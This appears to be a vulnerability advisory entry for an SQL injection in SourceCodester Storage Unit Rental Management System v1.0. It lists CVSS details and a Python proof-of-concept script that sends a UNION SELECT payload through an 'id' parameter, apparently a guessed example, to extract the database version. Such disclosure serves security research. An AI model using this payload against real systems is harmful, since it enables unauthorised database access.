SourceCodester Storage Unit Rental Management System v1.0 is vulnerable to SQL Injection in the file /storage/admin/maintenance/manage_storage_unit.php.
CVSS Details
CVSS Score
2.7
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N
Configurations (Affected Products)
No configuration data available.
SourceCodester Storage Unit Rental Management System v1.0
PoC / Exploit Code
⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
# Target URL
url = "http://target-host/storage/admin/maintenance/manage_storage_unit.php"
# Cookies for a high-privilege authenticated session (required per PR:H)
cookies = {
"PHPSESSID": "authenticated_admin_session_id"
}
# Vulnerable parameter (example: 'id')
# Payload attempts to extract database version
params = {
"id": "1' UNION SELECT 1, 2, version(), 4-- -"
}
try:
response = requests.get(url, params=params, cookies=cookies, timeout=10)
if response.status_code == 200:
print("[+] Request sent successfully.")
print("[+] Check response for SQL output.")
print(response.text[:500])
else:
print("[-] Target returned non-200 status.")
except Exception as e:
print(f"[-] Error: {e}")